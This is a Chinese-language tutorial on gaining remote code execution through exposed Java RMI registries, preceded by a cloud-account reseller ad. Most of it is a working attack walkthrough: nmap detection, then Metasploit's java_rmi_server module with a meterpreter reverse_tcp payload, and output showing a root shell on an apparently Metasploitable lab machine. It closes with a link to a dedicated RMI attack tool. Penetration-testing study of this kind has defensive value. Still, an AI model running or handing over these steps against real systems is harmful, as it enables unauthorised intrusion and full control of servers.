Java RMI漏洞利用(1099/1090对外开放-rce)
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
Java rmi介绍
Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。
RMI是J2SE的一部分能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象可以从另一个JAVA虚拟机上甚至跨过网络调用它的方法可以像调用本地JAVA对象的方法一样调用远程对象的方法使分布在不同的JVM中的对象的外表和行为都像本地对象一样。
对于任何一个以对象为参数的RMI接口你都可以发一个自己构建的对象迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。
RMI的传输100%基于反序列化。端口1099。
探测目标rmi
使用Nmap -p 1099 -sV IP地址探测目标的版本信息。
➜ ~ nmap -sV -p 1099 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
1099/tcp open Java-rmi Java RMI Registry
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds
rmi远程命令执行利用方法一
使用Metasploit 对 rmi RCE漏洞利用。
1、 登录msfconsole
➜ ~ msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2、使用exploit/multi/misc/java_rmi_server模块
msf5 > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
3、设置payload
msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
lhost => 10.0.2.12
4、检查配置
msf5 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
5、进行漏洞攻击
msf5 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Server started.
[*] 10.0.2.5:1099 - Sending RMI Header...
[*] 10.0.2.5:1099 - Sending RMI Call...
[*] 10.0.2.5:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400
id
[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.0.2.5:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/java_rmi_server) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ metasploitable 10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)
msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
rmi远程命令执行利用方法二
直接下载工具attackRMI.jar
github地址
A-D-Team/attackRmi (github.com)